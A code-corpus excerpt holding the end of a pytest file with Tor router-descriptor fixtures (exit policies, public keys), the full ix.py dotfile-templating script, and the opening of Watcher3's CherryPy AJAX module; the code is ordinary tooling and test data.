reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.17.32/21:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 172.16.58.3/22:*
reject 192.168.127.12/22:*
reject 192.168.3.11/22:*
reject 172.16.17.32/21:*
reject 192.168.3.11/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/22:*
reject 172.16.17.32/22:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 172.16.58.3/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/22:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
accept *:20-21
accept *:43
accept *:53
accept *:80
accept *:110
accept *:143
accept *:220
accept *:443
accept *:873
accept *:989-990
accept *:991
accept *:992
accept *:993
accept *:995
accept *:1194
accept *:1293
accept *:3690
accept *:4321
accept *:5222-5223
accept *:5228
accept *:9418
accept *:11371
accept *:64738
reject *:*
tunnelled-dir-server
router-sig-ed25519 JWCYm75YxNMFHgUUI4cJyRgDGwcIedVSYIQERCdJFlRMjxPS9LOvcUzuv4rBZQLC3RAA80j7D5udcfeW0R0SDw
router-signature
-----BEGIN SIGNATURE-----
SLhtm94eITNNjle4PRclrt7uW/PswS<KEY>tD+ENoZQx02HNWhD2Ovw8D
LEAPxV9sbjt8fzJ/EIzdl8vh+Nz2SIPJFBU1dkRkWSVE+Is0JPRqNKlzpVpWfW8h
zKOoQK1MV0YfYNhvLoSV9li7ed1GJrw9kmWOUgoRV3s=
-----END SIGNATURE-----
"""
def test_rd_parser(rd_example):
res = RouterDescriptorParser.parse(rd_example)
print(res)
@pytest.fixture
def rd_example2():
return """router FalkensteinTor02 172.16.58.3 9001 0 0
identity-ed25519
-----BEGIN ED25519 CERT-----
AQ<KEY>
L<KEY>
-----END ED25519 CERT-----
master-key-ed25519 E5QPti6y4w8KJY1W24A5m7nUjyPGXMYi0dKg2iAbJSw
or-address [2a01:4f8:161:32c7::2]:9001
platform Tor 0.4.5.0-alpha-dev on Linux
proto Cons=1-2 Desc=1-2 DirCache=1-2 FlowCtrl=1 HSDir=1-2 HSIntro=3-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-3
published 2020-08-20 09:56:35
fingerprint 0512 FE6B E9CC A0ED 1331 52E6 4010 B2FB A141 EB10
uptime 64805
bandwidth 31457280 73400320 33471488
extra-info-digest F631D985A46F850C46FE2355947D36CA45DBE335 M/2vGW74uurcpt0e+7/EJqOV4LpoJRYAZ+G7I9f58L4
onion-key
-----<KEY>
-----END RSA PUBLIC KEY-----
signing-key
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAL+bi9Kfe8dhwaaq8c5kcAXbCHUyvfx9gVBCuDj7jAOQKy16zBfuUh7q
614bwRiD4sFC4QFq+j43EjJgXeReAH9sDeWJxP3Q9muEuCcqfmf+OAlYjruXEYrT
LEO6q2Hd22nJ9WaxEHgvSCvECTNmODUdgP0DJpkKcwks3VM4wamZAgMBAAE=
-----END RSA PUBLIC KEY-----
onion-key-crosscert
-----<KEY>
-----END CROSSCERT-----
ntor-onion-key-crosscert 1
-----BEGIN ED25519 CERT-----
<KEY>
-----END ED25519 CERT-----
family $0512FE6BE9CCA0ED133152E64010B2FBA141EB10 $08F06A0DDAFABF9A26FCB2E392A1435F9E048216 $0A7208B8903DD3FF5CDFA218A3823AF498CE69CE $128FC6D8FBF753121C5662FEE309CCD47B64BA6B $599A708756048993A1029B2775EEF8C9E40BB640 $695D811B130673C2DE8DCFC5A9E742790BD25066 $7185B69E3267E71D0E4CBE30209677205DEA5E67 $8E5F4EE45E0631A60E59CAA42E1464FD7120459D $B70BD334FFEE23E653B75219AE12CF0236BCFCBB $B76A047C20D3E4F9B5A64428298DA55A90D62472 $D7230F4F13324A28C308AF94E2385D0A7F1B05F9 $DEF8C760A79FEF2358E03AE5A1950086ABEB953E $F0F13714732C347312426EC2B8D5C4940EAA45BA $F5C3DA7642BB037E0D279359AE88CD7FC03A98A0
hidden-service-dir
contact <tor AT afo MINUS tm DOT org>
ntor-onion-key xbqQBTwgBWJxkxBrHuHsKp5WyZ4yof09zsnGZMXB+Rk
reject *:*
tunnelled-dir-server
router-sig-ed25519 Hk2KgDHyw7OAo8g79eo7mEHK/k3UszFAH1Fkole70BIdUDOvA/8oHwSA2aO+Rp1i6v0I/LlKr0u8/pqDzGd7Bg
router-signature
-----BEGIN SIGNATURE-----
UmJeAncV38dJBgsKSVxw14cRdo/YTu3owAa+YJOWkWsNl03UATGeNAWQGc2ZwhI3
nk4ha7uQ254z5uDyWT5vD7QbPREcFbWvif7EWRqqBi0kdwSClYzMI/+4dFh+dz3v
jvfDaEld8KBz3UxumcxRnswmDzC9zsS3Bq/LxQ7LrR4=
-----END SIGNATURE-----
"""
def test_rd_parser2(rd_example2):
res = RouterDescriptorParser.parse(rd_example2)
print(res)
``` |
{
"source": "0x20F/ix",
"score": 2
} |
#### File: 0x20F/ix/ix.py
```python
import os, configparser, argparse
import re, threading, json, hashlib
import pathlib
from datetime import datetime
# Global verbosity check
# Get's changed by command line flag '-v'
verbose = False
# Colors
RED = '\x1B[31;1m'
CYAN = '\x1B[36m'
GREEN = '\x1B[32;1m'
YELLOW = '\x1B[33;1m'
RESET = '\x1B[0m'
WHITE = '\x1B[37;1m'
MAGENTA = '\x1B[35;1m'
# _
# ___| | __ _ ___ ___ ___ ___
# / __| |/ _` / __/ __|/ _ \/ __|
# | (__| | (_| \__ \__ \ __/\__ \
# \___|_|\__,_|___/___/\___||___/
# -------------------------------------------------------------------------
class Parser:
@staticmethod
def get_config_key(key):
'''
Given a key of the format 'key.value', find out what the
value for the variable of that format is within the ix config
'''
try:
k, v = key.strip().split('.', 1)
return config[k][v]
except:
return None
@staticmethod
def get_secondary_key_value(key):
'''
Unwrap whether or not a configuration value exists
for the given key.
Parameters:
key (str): The key to look for
Returns:
str: The value, or null
'''
value = Parser.get_config_key(key)
if not value:
return None
return os.path.expandvars(value)
@staticmethod
def get_main_key_value(key):
'''
Unwrap whether or not a configuration value exists
for the given key, as well as making sure to unravel
any helpers within the provided key.
Parameters:
key (str): The key to look for
Returns:
str: The value, or null
'''
stripped = key.strip()
value = None
if len(stripped.split(' ', 1)) == 1:
value = Parser.get_config_key(key)
if not value: return None
return os.path.expandvars(value)
# Check for helpers
helper, parameters = stripped.split(' ', 1)
parameters = [ param.strip() for param in parameters.split(';') ]
# First argument doesn't have a name
main = parameters.pop(0)
main = Parser.get_config_key(main) or main
modifier_keys = list()
modifier_values = list()
for param in parameters:
name, value = param.split(':')
name = name.strip()
value = value.strip()
modifier_keys.append(name)
modifier_values.append(Parser.get_config_key(value) or value)
modifiers = dict(zip(modifier_keys, modifier_values))
value = Helpers.call(helper, main, modifiers)
return os.path.expandvars(value)
@staticmethod
def parse_secondary_keys(string, prefix):
'''
Find secondary variables within a file ( these are variables within main variables ),
denoted by '[]', and look whether or not they have a defined value inside the configuration
file.
If they do, replace the variable with the value from the configuration.
Parameters:
string (str): The data we want to look through for variables
prefix (str): What prefix the parent variables are denoted by
'''
pattern = re.compile('%s{{.+\\[(.+?)\\].+}}' % re.escape(prefix), re.MULTILINE)
items = set(re.findall(pattern, string))
unmatched = None
contents = string
for key in items:
value = Parser.get_secondary_key_value(key)
if not value:
if not unmatched: unmatched = []
unmatched.append(f'[{key}]')
continue
contents = contents.replace(f'[{ key }]', value)
return ( contents, unmatched )
@staticmethod
def parse_main_keys(string, prefix):
'''
Find main variables within a file ( something like ${{}} ) and look
whether or not they have a defined value inside the configuration file.
If they do, repalce the variable with the value from the configuration.
Parameters:
string (str): The data we want to look through for variables
prefix (str): What prefix the variables are denoted by
'''
pattern = re.compile('%s{{(.+?)}}' % re.escape(prefix), re.MULTILINE)
items = set(re.findall(pattern, string))
unmatched = None
contents = string
for key in items:
full_key = '{}{}{}{}'.format(prefix, sequence[0], key, sequence[1])
value = Parser.get_main_key_value(key)
if not value:
if not unmatched: unmatched = []
unmatched.append(full_key)
continue
contents = contents.replace(full_key, value)
return (contents, unmatched)
@staticmethod
def expand_ix_vars(string, prefix):
'''
Look through a given string of data in a file and find every
variable starting with the prefix defined for that specific file.
Replace all thos variables with their related values inside the
configuration file.
Parameters:
string (str): The string contents in which to look for variables
prefix (str): The prefix used for including the variables in the given string
Returns:
contents (str): The original content with all the variables replaced
unmatched (list): The keys for all the variables that couldn't be matched within the string
'''
contents, unmatched_secondary = Parser.parse_secondary_keys(string, prefix)
contents, unmatched_main = Parser.parse_main_keys(contents, prefix)
if not unmatched_secondary: unmatched_secondary = []
if not unmatched_main: unmatched_main = []
unmatched = unmatched_main + unmatched_secondary
return (contents, unmatched)
@staticmethod
def wrap_file(file_path):
'''
Wrap a file and its contents in the custom File class
to allow for easier handling.
This finds whether or not a file is ix compatible, what
comment type it uses, and makes sure to setup all the ix
configuration found within the file.
Parameters:
file_path (str): The path to the file we want to wrap
'''
root, name = file_path.rsplit('/', 1)
file = get_file_lines(file_path)
if not file:
return None
lines = list(file)
found = False
current = None
# Check the first few lines of the file for the trigger.
# If the trigger isn't found, assume this file shouldn't
# be processed.
for idx, line in enumerate(lines):
for entry in entries:
start = '{}{}'.format(entry, notation)
if line.startswith(start):
if trigger in line:
found = True
current = File(root, name, start)
continue
if not found:
continue
clean = line.replace(start, '').strip()
if clean.startswith(tuple(current.fields)):
field, data = clean.split(':', 1)
current.load_field((field, data))
continue
if idx == 20 and not found:
return None
return current
@staticmethod
def find_ix(root):
'''
Find all files that contain the 'ix' trigger so we know what
needs parsing.
Parameters:
root (str): The directory to look into for files
Returns:
list: All the files in the directory that contain the trigger
'''
ix_files = []
for root, _, files in os.walk(root):
for name in files:
if name.endswith('.ix'): continue
full_path = root + '/' + name
file = Parser.wrap_file(full_path)
if file:
ix_files.append(file)
return ix_files
@staticmethod
def process_file(file):
'''
Go through the given file's contents and make sure to replace
all the variables that have matches within the 'ixrc' configuration
as well as making sure to remove every trace of 'ix' itself from
the processed file, leaving it nice and clean, as well as making sure
to add the processed file, to the lock file so we don't have to process
it again unless it's contents change.
Parameters:
file (File): The file object to parse
'''
processed = file.parse()
if not file.rules:
regex = re.compile('^{}.+[\\s\\S]$'.format(file.notation), re.MULTILINE)
for line in re.findall(regex, processed):
processed = processed.replace(line, '')
try:
with open(file.get_output_path(), 'w') as f:
f.write(processed)
if file.has_custom_access:
os.chmod(file.get_output_path(), file.access)
lock_file[file.original_path] = file.to_dict()
except FileNotFoundError:
error('Could not find output path: {}.\n\tUsed in file: {}'.format(file.get_output_path(), file.original_path), True)
return
success('Saved: {1}{2}{0} to {1}{3}'.format(WHITE, RESET, file.original_path, file.get_output_path()), True)
class Helpers:
'''
List of all the helpers that can be used within files when
including variables and/or templating
Helpers can only be used within main variables, aka. '${{ thing.thing }}'
Parameters:
helper (str): The name of the helper function to run
value (str/int): The value to perform the function on
modifiers (dict): Extra parameters passed to the helper to further tweak the value
'''
@staticmethod
def call(helper, value, modifiers):
'''
Call a specific helper, if defined
'''
try:
method = getattr(Helpers, helper)
return method(value, **modifiers)
except Exception as e:
error(f'{e!r} ---- helper: {helper}')
return ''
@staticmethod
def rgb(value, alpha = None):
'''
Take a hex string ( #181b21 ) and convert it to 'rgb'.
If an rgb or rgba string is provided, if the opacity isn't
overwritten, it'll just return the string that was passed in.
If the opacity is overwritten, however, it'll replace the alpha
field within the given string.
Optionally, pass in opacity to override or add the alpha channel.
'''
# We got an rgb value
if not value.startswith('#'):
# Give it back as it is if no overrides are specified
if not alpha: return value
values = [ x.strip() for x in value.split('(', 1).pop().rstrip(')').split(',') ]
r = values[0]
g = values[1]
b = values[2]
a = alpha
return f'rgba({r}, {g}, {b}, {a})'
string = value.lstrip('#')
r, g, b = tuple(int(string[i:i+2], 16) for i in (0, 2, 4))
a = ''
if len(string) == 8:
a = round(int(string[6:6+2], 16) / 255, 2)
if alpha:
a = alpha
if a != '': tag = f'rgba({r}, {g}, {b}, {a})'
else: tag = f'rgb({r}, {g}, {b})'
return tag
@staticmethod
def hex(value, alpha = None, argb = None):
'''
Take an rgb/rgba string and convert it to a hex representation
of the same color. If a hex string is provided, it'll return the exact
same hex string unless the opacity is overwritten. If it is, it'll
replace the alpha field within the given string.
Optionally pass in opacity to override or add the alpha channel.
'''
if alpha:
alpha = hex(round(float(alpha) * 255))[2:]
# We got a hex string
if value.startswith('#'):
# Give it back as it is if no overrides are specified
if not alpha: return value
value = value[1:7]
if argb:
return f'#{alpha}{value}'
return f'#{value}{alpha}'
a = value.startswith('rgba')
value = value.split('(', 1).pop().rstrip(')').split(',')
r = hex(int(value[0]))[2:]
g = hex(int(value[1]))[2:]
b = hex(int(value[2]))[2:]
a = hex(round(float(value[3]) * 255))[2:] if a else ''
if alpha: a = alpha
if argb:
return f'#{a}{r}{g}{b}'
return f'#{r}{g}{b}{a}'
@staticmethod
def include(path):
'''
Include a given file directly into the current file.
This allows you to import/merge multiple files into one.
If the file you're importing is an ix compatible file,
it will be parsed, otherwise the plain text will be included.
Environment variables work, as well as ix variables.
'''
path = os.path.expandvars(path)
file = Parser.wrap_file(path)
# If it's not an ix file just read the contents
if not file:
with open(path) as f:
return f.read()
contents, _ = Parser.expand_ix_vars(file)
return contents
@staticmethod
def uppercase(string):
'''
Turn a given string to uppercase.
Environment variables work, as well as ix variables.
'''
return string.upper()
@staticmethod
def lowercase(string):
'''
Turn a given string to lowercase.
Environment variables work, as well as ix variables.
'''
return string.lower()
class File:
'''
Structured class to keep track of everything about each
file that needs parsing. Such as the comment type,
the paths, the ix-configuration, and so on.
'''
def __init__(self, root, name, notation = '#', rules = None) -> None:
self.original_path = root + '/' + name
self.name = name
self.notation = notation
self.hash = ''
self.rules = rules
# Flags
self.has_custom_dir = False
self.has_custom_name = False
self.has_custom_access = False
# Config fields
self.to = root
self.prefix = '#'
self.access = ''
self.fields = {
'to': self.__set_to,
'out': self.__set_to,
'as': self.__set_as,
'name': self.__set_as,
'prefix': self.__set_prefix,
'access': self.__set_access
}
def get_output_path(self) -> str:
'''
Get the full (directory + filename) path for the current file.
Making sure to account for the location, and add an '.ix' extension
to the filename if the directory is the same as the original file.
We do not want to overwrite the original file.
Parameters:
self (File): The current file object
'''
extension = ''
# If no custom directory was defined
# and no custom filename was defined
# we add '.ix' to the original file name
# when saving so we don't overwrite the original
if not self.has_custom_dir:
if not self.has_custom_name:
extension = '.ix'
# If we have a custom directory
# we write to that directory, with whatever the current
# name is.
return self.to + '/' + self.name + extension
def load_field(self, field_tuple):
'''
Parse a given 'ix' configuration field. Usually comes in the following
format `out: /path/to/whatever`. Find out what item this configuration
field refers to and run the expected actions for said item.
Parameters:
self (File): The current file object
field (str): The field line directly from a file, with the comment stripped
'''
field, data = field_tuple
parse = self.fields.get(field, lambda x: 'No such field: ' + field)
if isinstance(data, str):
parse(data.strip())
else:
parse(data)
def __set_to(self, data):
'''
Update the directory that the processed file should be saved
to once done, making sure to create said directory if it
doesn't exist already and to expand any environment variables
or 'ix' variables within it.
This is used to parse a specific field from the ix configuration.
Parameters:
self (File): The current file object
data (str): The new output directory
'''
expanded = os.path.expandvars(data)
expanded = self.__unwrap_parse(Parser.expand_ix_vars(expanded, self.prefix))
# If the given directory does not exist
# we want to create it.
if not os.path.isdir(expanded):
info('{} does not exist, creating it for the following file: {}'.format(expanded, self.name), True)
os.makedirs(expanded)
self.has_custom_dir = True
self.to = expanded
def __set_as(self, data):
'''
Update the name that the processed file should have when it
gets saved to the file system.
This is used to parse a specific field from the ix configuration.
Parameters:
self (File): The current file object
data (str): The new file name + extension (if any)
'''
self.has_custom_name = True
self.name = self.__unwrap_parse(Parser.expand_ix_vars(data, self.prefix))
def __set_prefix(self, data):
'''
Replace the default prefix for this specific file.
This is used to parse a specific field from the ix configuration.
Parameters:
self (File): The current file object
data (str): The new prefix
'''
expanded = self.__unwrap_parse(Parser.expand_ix_vars(data, self.prefix))
self.prefix = expanded
def __set_access(self, data):
'''
Take in a decimal string of permissions in 'chmod' format
and turn them into an octal value instead since that is the
only format the python implementation of chmod will accept.
This is used to parse a specific field from the ix configuration.
Parameters:
self (File): The current file object
data (str): The permissions in 'chmod' format
'''
self.has_custom_access = True
# Turn the perms to octal since chmod only accepts that
expanded = self.__unwrap_parse(Parser.expand_ix_vars(data, self.prefix))
self.access = int(expanded, 8)
def __unwrap_parse(self, parsed):
'''
Spread the tuple returned from an expansion of ix variables and making
sure to display a message if some variables were not found.
Parameters:
self (File): The current instance
parsed (tuple): (parsed contents, unmatched variables)
'''
contents, unmatched = parsed
if unmatched:
variables = '\n\t'.join(unmatched)
warn(f'Could not find\n\t{ variables }\n in { self.original_path }\n', True)
return contents
def to_dict(self):
'''
Put everything about this file that we want to store in
the lock file within a dictionary
Parameters:
self (File): The current file object
'''
return {
'hash': self.hash_contents(),
'output': self.get_output_path(),
'created_at': str(datetime.now())
}
def hash_contents(self):
'''
Hash the entire file contents, not all at once of course,
do it in chunks in case we hit some massive files we don't want to
eat up all the RAM.
The hash is later used to create unique identifiers for different purposes.
One of which is to store the hash in the lock file and later compare when
checking whether or not a file should be parsed again.
The hashing is done in md5 since it's fast and we really don't have to
worry about colisions. The chances of the same file colliding are extremely
small.
Parameters:
self (File): The current file object
'''
if self.hash != '':
return self.hash
md5 = hashlib.md5()
with open(self.original_path, 'rb') as bytes:
while True:
data = bytes.read(65536)
if not data:
break
md5.update(data)
digest = md5.hexdigest()
self.hash = digest
return digest
def parse(self):
'''
Parse the contents of the file, replacing
all variables with their defined values.
Parameters:
self (File): The current file obejct
'''
with open(self.original_path, 'r') as f:
contents = self.__unwrap_parse(Parser.expand_ix_vars(f.read(), self.prefix))
return contents
# __ _ _
# / _|_ _ _ __ ___| |_(_) ___ _ __ ___
# | |_| | | | '_ \ / __| __| |/ _ \| '_ \/ __|
# | _| |_| | | | | (__| |_| | (_) | | | \__ \
# |_| \__,_|_| |_|\___|\__|_|\___/|_| |_|___/
# -------------------------------------------------------------------------
def out(message, forced = False):
if forced or verbose:
print(message)
def info(message, f = False): out(CYAN + 'ℹ ' + WHITE + message + RESET, f)
def error(message, f = False): out(RED + '✖ ' + message + RESET, f)
def warn(message, f = False): out(YELLOW + '⚠ ' + WHITE + message + RESET, f)
def success(message, f = False): out(GREEN + '✔ ' + WHITE + message + RESET, f)
def log(message, f = False): out(MAGENTA + '~ ' + WHITE + message + RESET, f)
def get_file_lines(file_path):
'''
Try and open a file as a normal text file.
If succeeded, return an array of all the lines
inside that file.
'''
try:
# Try and open the file as a normal text file
# Abort if it's binary or something else
file = open(file_path, 'r')
lines = list(file)
file.close()
return lines
except PermissionError:
info('No permission to access file, ignoring: ' + file_path)
return None
except:
info('Found non-text file, ignoring: ' + file_path)
return None
def read_config(at):
'''
Read the 'ix' configuration from it's specific path.
Either user defined, or the default one. Use config parser
to load and resolve all the magic that the .ini format provides.
Parameters:
at (str): The exact path to the config file
'''
config = configparser.ConfigParser()
config._interpolation = configparser.ExtendedInterpolation()
config.read(at)
return config
def read_lock_file(path):
'''
Read a JSON file into a dictionary allowing us to do
quick lookups for specific files whenever we need to check
if one was already parsed or not, allowing us to skip part of the
process.
Parameters:
path (str): The directory of the lock file
'''
try:
file = open(path + '/ix.lock')
contents = json.loads(file.read())
file.close()
return contents
except FileNotFoundError:
# Start fresh if the file doesn't exist
return {}
def save_lock_file(path, data):
'''
Save a dictionary full of all parsed files to a file.
This will be used later on when 'ix' runs again in order
to check which files have changed and only re-process those files.
Giving a bit of a performance boost in very large directories.
Parameters:
path (str): The directory of the lock file
data (dict): Dictionary full of all the file data that we care about saving
'''
if not os.path.isdir(path):
os.makedirs(path)
with open(path + '/ix.lock', 'w') as lock:
lock.write(json.dumps(data))
def cleanup():
'''
Attempt to remove all the files that were previously
processed and stored in the cache, making sure to
clear the cache when done so we're starting fresh.
'''
lock = read_lock_file(lock_path)
info('Purging all previous builds...', True)
if lock == {}:
log('Found no items in cache, exiting...', True)
for _, entry in lock.items():
file = entry['output']
try:
os.remove(file)
log(f'\tRemoved: {file}')
except Exception as e:
error(f"Couldn't remove: {file} - {e!r}")
save_lock_file(lock_path, {})
success('Done', True)
def main(rules = None):
'''
The main entrypoint for the program.
Initializes everything that needs to happen.
From finding all the 'ix' files to creating new Threads for
parsing each of the available files, as well as saving and updating
the lock file once everything has been processed.
Args:
args (dict): The arguments passed to the program
'''
threads = list()
if rules:
files = list()
for f in rules['parse']:
root, name = f['file'].rsplit('/', 1)
if not os.path.isfile(f['file']):
error('Could not find file: ' + f['file'])
continue
file = File(root, name, rules = f)
for field in f.items():
file.load_field(field)
files.append(file)
else:
files = Parser.find_ix(root_path)
unchanged = 0
saved = 0
if len(files) > 0:
info('Found {} ix compatible files'.format(len(files)))
else:
log('Found no ix compatible files in: {}.'.format(root_path))
log('Exiting.')
return
for file in files:
if file.original_path in lock_file:
hash = file.hash_contents()
lock = lock_file[file.original_path]
# Don't run for files that haven't changed
if lock and hash == lock['hash']:
unchanged += 1
continue
thread = threading.Thread(target=Parser.process_file, args=(file,))
threads.append(thread)
thread.start()
saved += 1
for thread in threads:
thread.join()
# Logging
if saved > 0:
success('Saved {} files'.format(saved), True)
if unchanged > 0:
log('Skipped {} files because they were unchanged'.format(unchanged))
# Cache all the parsed files
save_lock_file(lock_path, lock_file)
# __ _ _ _
# ___ ___ _ __ / _(_) __ _ _ _ _ __ __ _| |_(_) ___ _ __
# / __/ _ \| '_ \| |_| |/ _` | | | | '__/ _` | __| |/ _ \| '_ \
# | (_| (_) | | | | _| | (_| | |_| | | | (_| | |_| | (_) | | | |
# \___\___/|_| |_|_| |_|\__, |\__,_|_| \__,_|\__|_|\___/|_| |_|
# |___/
# -------------------------------------------------------------------------
# Symbol configurations
notation = ':'
trigger = 'ix-config'
entries = [ '//', '#', '--', '--[', '/*', '*' ]
sequence = [ '{{', '}}' ]
# Directory configurations
root_path = os.path.expandvars('$HOME/dots')
config_path = os.path.expandvars('$HOME/.config/ix/ixrc')
lock_path = os.path.expandvars('$HOME/.cache/ix')
lock_file = None
config = None
# Commandline arguments
parser = argparse.ArgumentParser(description='Find and replace variables in files within a given directory')
parser.add_argument('-c', '--config', help='The path where the .ix configuration is located. Default $HOME/.config/ix/ixrc')
parser.add_argument('-r', '--rules', help='File that contains a list of all files to be parsed and included. Used instead of the #ix-config header in each individual file')
parser.add_argument('-d', '--directory', help='The directory to parse. Default $HOME/dots')
parser.add_argument('-f', '--field', help='Get a specific field value from the config')
parser.add_argument('--full', help='Skip looking at the cache and parse everything', action='store_false')
parser.add_argument('--reverse', help='Remove all the parsed files (everything defined in the cache)', action='store_true')
parser.add_argument('-v', '--verbose', help='Output extra information about what is happening', action='store_true')
args = parser.parse_args()
json_rules = None
if args.rules:
with open(args.rules) as file:
json_rules = json.load(file)
if args.verbose:
verbose = True;
if args.config:
if args.rules:
config_path = json_rules['vars_file']
else:
config_path = args.config
if args.field:
config = read_config(config_path)
contents = Parser.get_main_key_value(args.field)
print(contents)
# The whole thing doesn't need to run
# if only one field is needed
exit()
if args.directory:
if args.rules:
root_path = pathlib.Path(os.path.expandvars(json_rules['root'])).absolute()
else:
root_path = pathlib.Path(os.path.expandvars(args.directory)).absolute()
# Load in the cache if not specified
# otherwise.
if not args.full:
lock_file = {}
else:
lock_file = read_lock_file(lock_path)
# Load in the config
config = read_config(config_path)
# Run
if __name__ == '__main__':
# Windows handles colors weirdly by default
if os.name == 'nt':
os.system('color')
if not args.full:
info('Skipping cache, doing a full parse...', True)
cleanup()
if args.reverse:
cleanup()
main(rules = json_rules)
``` |
{
"source": "0x20Man/Watcher3",
"score": 2
} |
#### File: Watcher3/core/ajax.py
```python
import json
import logging
import os
import threading
import time
import cherrypy
import datetime
import core
from core import config, library, searchresults, searcher, snatcher, notification, plugins, downloaders
from core.library import Metadata, Manage
from core.movieinfo import TheMovieDatabase, YouTube
from core.providers import torrent, newznab
from core.helpers import Conversions
import backup
from gettext import gettext as _
logging = logging.getLogger(__name__)
class Errors():
''' Namespace for common error messages used in AJAX responses '''
database_write = _('Unable to write to database.')
database_read = _('Unable to read {} details from database.')
tmdb_not_found = _('Unable to find {} on TheMovieDB.')
class Ajax(object):
''' These are all the methods that handle ajax post/get requests from the browser.
Except in special circumstances, all should return an 'ajax-style response', which is a
dict with a response key to indicate success, and additional keys for expected data output.
For example {'response': False, 'error': 'something broke'}
{'response': True, 'results': ['this', 'is', 'the', 'output']}
'''
@cherrypy.expose
@cherrypy.tools.json_out()
def library(self, sort_key, sort_direction, limit=50, offset=0, hide_finished=False):
''' Get 50 movies from library
sort_key (str): column name to sort by
sort_direction (str): direction to sort [ASC, DESC]
limit: int number of movies to get <optional - default 50>
offset: int list index postition to start slice <optional - default 0>
hide_finished (bool): get finished/disabled movies or not
hide_finished will be converted to bool if string is passed
